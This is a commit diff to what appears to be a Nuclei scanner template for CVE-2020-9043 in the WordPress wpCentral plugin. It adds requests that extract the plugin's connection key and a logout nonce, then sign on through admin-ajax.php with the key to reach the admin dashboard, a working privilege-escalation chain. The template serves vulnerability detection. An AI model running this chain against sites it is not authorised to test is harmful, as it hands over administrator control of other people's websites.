Update CVE-2020-9043.yaml

2022-07-24 22:51:53 +05:30 · 2022-07-24 22:51:53 +05:30 · 9aec19a49c
parent 9c9d1ca4ae
commit 9aec19a49c
1 changed files with 24 additions and 3 deletions
--- a/cves/2020/CVE-2020-9043.yaml
+++ b/cves/2020/CVE-2020-9043.yaml
@ -32,19 +32,40 @@ requests:
        GET /wp-admin/index.php HTTP/1.1
        Host: {{Hostname}}

+      - |
+        GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
    cookie-reuse: true
    req-condition: true
    matchers:
      - type: dsl
        dsl:
-          - "contains(all_headers_2, 'text/html')"
-          - "status_code_2 == 200"
-          - "contains(body_2, 'wpCentral Connection Key')"
+          - "contains(all_headers_4, 'text/html')"
+          - "status_code_4 == 200"
+          - "contains(body_4, 'wpCentral Connection Key')"
+          - contains(body_4, "pagenow = \'dashboard\'")
        condition: and

    extractors:
      - type: regex
+        name: authkey
        part: body
        group: 1
        regex:
          - 'style="word-wrap:break-word;">([a-z0-9]+)'
+        internal: true
+
+      - type: regex
+        name: nonce
+        part: body
+        group: 1
+        regex:
+          - '_wpnonce=([0-9a-z]+)'
+        internal: true